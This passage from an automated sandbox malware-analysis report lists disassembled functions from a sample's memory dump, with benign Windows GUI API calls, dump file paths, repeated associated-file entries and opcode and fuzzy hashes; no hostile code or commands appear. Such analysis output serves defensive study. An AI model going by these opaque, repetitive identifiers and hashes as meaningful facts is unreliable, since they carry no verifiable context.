                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_AddMasked
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-822293376
                                                                                                                                                                                                                                                                                    • Opcode ID: 2cef274448d629194f45eaed383d3ce2d55fe80bf2e66e2031492a90ae4c9555
                                                                                                                                                                                                                                                                                    • Instruction ID: f86be7005d8cc87f643f266e3e9cbb46ccc5d3431ffdeeb8f838823e3b4bd8b2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cef274448d629194f45eaed383d3ce2d55fe80bf2e66e2031492a90ae4c9555
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F06275611B019FDB209F68D948B06BBF8AF18B15B40883DA5AAD3A55D638E540CB04
                                                                                                                                                                                                                                                                                    Function 00504274 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 893888af18e71582d7d8a6e2594258244a1919dfa8c6d50e086ea7ae5b819a09
                                                                                                                                                                                                                                                                                    • Instruction ID: 8331d68c480371aadc1d9719c9c5c183a05d30e21e2b40b16138d506a35b66a2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 893888af18e71582d7d8a6e2594258244a1919dfa8c6d50e086ea7ae5b819a09
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE51CFB6605203AFDB299F54D845BAEBFA4FF40310F24992DEA05872D1E731AC91CF90
                                                                                                                                                                                                                                                                                    Function 0042C850 Relevance: 6.1, APIs: 4, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C87E
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042C88F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C8C7
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042C8D2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 166717107-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                    • Instruction ID: 1ae2c4f83a303b8bce0181d8b555b548ed397ea70dfa58a9d15d9eacc3878f9d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC511AB1204301AFD714DE28CD85FABB7EAFBC4704F008A1DF99953694DBB0AD49CA65
                                                                                                                                                                                                                                                                                    Function 00410A20 Relevance: 6.1, APIs: 4, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00410AB3
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00410AC5
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00410AFA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00414FD0: GetParent.USER32(?), ref: 00414FD4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 00410AE5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Parent$CriticalEnterMessageRedrawSectionSendWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1290606431-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                    • Instruction ID: 5206ba9288f2f952280e77a0a87cb2f91fe58ff6aeb235107940afbc2e9b071e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631B1723087049BD320DF64DC81F9BB3A4FB98720F10461EE9498B780DB79E841CB9A
                                                                                                                                                                                                                                                                                    Function 00451F00 Relevance: 6.1, APIs: 4, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClearVariant$AllocString
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2502263055-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                    • Instruction ID: d31ef5bb5228e6c3ad645c8f3d1319e11389829958ef149dbed2cab14c92e82a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15316F722087059FC310CF58C880B5BB7E8EF88718F104A2EF95997350DB79E909CB9A
                                                                                                                                                                                                                                                                                    Function 00410560 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 0041056D
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041058D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 004105E2
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041063B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Rect$ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2970461787-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                    • Instruction ID: ce4c3b2ba86c6f6c119685c1f909f4ca062621dcfedb5de8325838dac45ff1a4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2314071244305AFD204DF61CCC5FABB3E9EBC8748F048A0CF58957290D674EA468B65
                                                                                                                                                                                                                                                                                    Function 0040F130 Relevance: 6.1, APIs: 4, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 0040F162
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040F17A
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040F19B
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0040F210
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientMessageRectReleaseSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1863454828-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                    • Instruction ID: d6bf508d08b3a67db9d2b0dabc6a54fdde4e7c081a099a00f88e8aa49dac70a3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C3128B5204341AFC314DF68C984E5AB7E9FB88610F104A1EF559C3290EB34A905CB55
                                                                                                                                                                                                                                                                                    Function 00454EF0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3839614884-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6861e29f0088fe8bf2482069452547d46f2b3a812a60965592cc082a0fa155da
                                                                                                                                                                                                                                                                                    • Instruction ID: 61ee5ff977679a68600c6b3ba5455a9d5faea7aa6e4a004e82da9cd24f1d17ea
